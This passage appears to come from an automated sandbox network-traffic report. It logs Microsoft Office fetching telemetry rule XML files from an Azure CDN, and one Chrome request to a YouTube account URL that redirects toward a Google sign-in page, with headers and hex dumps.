                                                                                                                                      2024-10-07 01:23:13 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      101192.168.2.44983813.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:13 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:13 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1360
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                      ETag: "0x8DC582BDDEB5124"
                                                                                                                                      x-ms-request-id: 62f7f1ae-f01e-0096-4d0c-1710ef000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012313Z-1657d5bbd48lknvp09v995n79000000002bg00000000p77r
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:13 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      102192.168.2.44983713.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:14 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:14 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:14 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1397
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                      ETag: "0x8DC582BE7262739"
                                                                                                                                      x-ms-request-id: 4035d6e2-a01e-0002-4602-175074000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012314Z-1657d5bbd48vlsxxpe15ac3q7n00000002pg00000000pkud
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:14 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      103192.168.2.44984513.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:14 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:15 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:15 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1401
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                      ETag: "0x8DC582BE2A9D541"
                                                                                                                                      x-ms-request-id: b6fa471e-401e-0067-43e5-1609c2000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012315Z-1657d5bbd4824mj9d6vp65b6n40000000310000000008s87
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:15 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      104192.168.2.44984413.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:14 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:15 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:15 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1427
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                      ETag: "0x8DC582BE56F6873"
                                                                                                                                      x-ms-request-id: 08bf7a15-f01e-0020-7706-17956b000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012315Z-1657d5bbd48gqrfwecymhhbfm800000001pg000000005xqa
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:15 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      105192.168.2.44984613.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:14 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:15 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:14 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1390
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                      ETag: "0x8DC582BE3002601"
                                                                                                                                      x-ms-request-id: 7d21ea5d-701e-0098-0502-17395f000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012314Z-1657d5bbd48p2j6x2quer0q028000000031g000000005cre
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:15 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      106192.168.2.449850142.250.185.1424432668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:14 UTC851OUTGET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/1.1
                                                                                                                                      Host: youtube.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-10-07 01:23:15 UTC1704INHTTP/1.1 301 Moved Permanently
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Expires: Mon, 07 Oct 2024 01:23:15 GMT
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:15 GMT
                                                                                                                                      Cache-Control: private, max-age=31536000
                                                                                                                                      Location: https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Vary: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script'
                                                                                                                                      Origin-Trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main"
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      107192.168.2.44984313.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:14 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:15 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:14 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1360
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                      ETag: "0x8DC582BDD74D2EC"
                                                                                                                                      x-ms-request-id: fbb49b00-e01e-00aa-4806-17ceda000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012314Z-1657d5bbd48xdq5dkwwugdpzr0000000036g000000000g86
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:15 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      108192.168.2.44985113.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:15 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:15 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:15 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1364
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                      ETag: "0x8DC582BEB6AD293"
                                                                                                                                      x-ms-request-id: 77012b0e-b01e-0097-0bff-164f33000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012315Z-1657d5bbd48lknvp09v995n79000000002g0000000003u6t
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:15 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      109192.168.2.44985513.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:15 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:15 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:15 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1391
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                      ETag: "0x8DC582BDF58DC7E"
                                                                                                                                      x-ms-request-id: a18d9b1d-601e-0002-1f03-17a786000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012315Z-1657d5bbd48f7nlxc7n5fnfzh000000002c000000000kuf5
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
